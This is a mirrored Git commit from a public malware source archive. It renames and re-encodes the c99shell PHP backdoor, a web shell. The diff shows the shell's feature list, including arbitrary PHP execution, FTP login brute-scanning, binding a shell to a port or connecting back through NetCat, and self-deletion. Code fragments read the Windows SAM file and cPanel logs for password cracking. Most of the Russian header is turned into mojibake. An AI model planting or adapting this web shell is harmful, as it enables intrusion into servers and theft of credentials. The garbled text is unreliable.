mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 02:16:09 +00:00
Rename Backdoor.PHP.C99Shell.a to Backdoor.PHP.C99Shell.ap
This commit is contained in:
parent
ad46ddacb9
commit
c142669f6c
@ -4,45 +4,45 @@
|
|||||||
*
|
*
|
||||||
* c99shell.php v.1.0 pre-release build #16
|
* c99shell.php v.1.0 pre-release build #16
|
||||||
* Freeware license.
|
* Freeware license.
|
||||||
* © CCTeaM.
|
* © CCTeaM.
|
||||||
* c99shell - файл-менеджер через www-броузер.
|
* c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð.
|
||||||
* Вы можете бесплатно скачать последнюю версию на домашней страничке продукта:
|
* Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
|
||||||
http://ccteam.ru/releases/c99shell
|
http://ccteam.ru/releases/c99shell
|
||||||
*
|
*
|
||||||
* WEB: http://ccteam.ru
|
* WEB: http://ccteam.ru
|
||||||
* ICQ UIN #: 656555
|
* ICQ UIN #: 656555
|
||||||
*
|
*
|
||||||
* Особенности:
|
* Îñîáåííîñòè:
|
||||||
* + управление локальными и удаленными (ftp, samba) файлами/папками, сортировка
|
* + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
|
||||||
* закачивание скачивание файлов и папок
|
* çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
|
||||||
* (предворительно упаковывается/распаковывается через tar)
|
* (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar)
|
||||||
* продвинутый поиск (возможен внутри файлов)
|
* ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
|
||||||
* modify-time и access-time у файлов не меняются при редактировании (для откл. см $filestealth)
|
* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (äëÿ îòêë. ñì $filestealth)
|
||||||
* + выполнение произвольного PHP-кода
|
* + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
|
||||||
* + кодировщик данных через md5, unix-md5, sha1, crc32, base64
|
* + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
|
||||||
* + быстрый локальный анализ безопасности ОС
|
* + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
|
||||||
* + быстрое ftp-сканирование на связки login;login из /etc/passwd (обычно дает доступ к 1/100 аккаунтов)
|
* + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
|
||||||
* постраничный вывод, сортировка, групповые операции над БД/таблицами, управление процессами SQL)
|
* ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
|
||||||
* + скрипт "любит" include: автоматически ищет переменные с дескрипторами и вставляет их в ссылки (опциально)
|
* + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
|
||||||
также можно изменить $surl (базовая ссылка) как через конфигурацию (принудительно) так и через cookie "c99sh_surl",
|
òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
|
||||||
идет авто-запись значения $set_surl в cookie "set_surl"
|
èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
|
||||||
* + возможность "забиндить" /bin/bash на определенный порт с произвольным паролем,
|
* + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
|
||||||
* или сделать back connect (производится тестирование соеденения, и выводятся параметры для запуска NetCat).
|
* èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
|
||||||
* + возможность быстрого само-удаления скрипта
|
* + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
|
||||||
* + автоматизированая отправка сообщений о недоработках и пожеланиях автору (через mail())
|
* + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèÿõ àâòîðó (÷åðåç mail())
|
||||||
*
|
*
|
||||||
* Приведен далеко не полный список возможностей.
|
* Ïðèâåäåí äàëåêî íå ïîëíûé ñïèñîê âîçìîæíîñòåé.
|
||||||
*
|
*
|
||||||
* Ожидаемые изменения:
|
* Îæèäàåìûå èçìåíåíèÿ:
|
||||||
* ~ Развитие sql-менеджера
|
* ~ Ðàçâèòèå sql-ìåíåäæåðà
|
||||||
* ~ Добавление недостающих расширений файлов
|
* ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
|
||||||
*
|
*
|
||||||
* ~-~ Пишите обо всех найденых недоработках, желаемых изменениях и доработках (даже о самых незначительных!)
|
* ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
|
||||||
в ICQ UIN #656555 либо через раздел "feedback", будут рассмотрены все предложения и пожелания.
|
â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
|
||||||
*
|
*
|
||||||
* Last modify: 14.09.2005
|
* Last modify: 14.09.2005
|
||||||
*
|
*
|
||||||
* © Captain Crunch Security TeaM. Coded by tristram
|
* © Captain Crunch Security TeaM. Coded by tristram
|
||||||
*
|
*
|
||||||
******************************************************************************************************
|
******************************************************************************************************
|
||||||
*/
|
*/
|
||||||
@ -741,7 +741,7 @@ function mysql_query_form()
|
|||||||
if ($tbl_struct)
|
if ($tbl_struct)
|
||||||
{
|
{
|
||||||
echo "<td valign=\"top\"><b>Fields:</b><br>";
|
echo "<td valign=\"top\"><b>Fields:</b><br>";
|
||||||
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
|
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
|
||||||
echo "</td></tr></table>";
|
echo "</td></tr></table>";
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -1044,7 +1044,7 @@ if ($act == "sql")
|
|||||||
{
|
{
|
||||||
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
|
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
|
||||||
$c = 0;
|
$c = 0;
|
||||||
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
|
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
|
||||||
if (!$c) {echo "No tables found in database.";}
|
if (!$c) {echo "No tables found in database.";}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -1340,7 +1340,7 @@ if ($act == "sql")
|
|||||||
$i++;
|
$i++;
|
||||||
}
|
}
|
||||||
echo "<tr bgcolor=\"000000\">";
|
echo "<tr bgcolor=\"000000\">";
|
||||||
echo "<td><center><b>»</b></center></td>";
|
echo "<td><center><b>»</b></center></td>";
|
||||||
echo "<td><center><b>".$i." table(s)</b></center></td>";
|
echo "<td><center><b>".$i." table(s)</b></center></td>";
|
||||||
echo "<td><b>".$trows."</b></td>";
|
echo "<td><b>".$trows."</b></td>";
|
||||||
echo "<td>".$row[1]."</td>";
|
echo "<td>".$row[1]."</td>";
|
||||||
@ -1569,7 +1569,7 @@ if ($act == "security")
|
|||||||
{
|
{
|
||||||
$v = $_SERVER["WINDIR"]."\repair\sam";
|
$v = $_SERVER["WINDIR"]."\repair\sam";
|
||||||
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
|
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
|
||||||
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
|
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
|
||||||
}
|
}
|
||||||
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
|
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
|
||||||
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
|
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
|
Loading…
Reference in New Issue
Block a user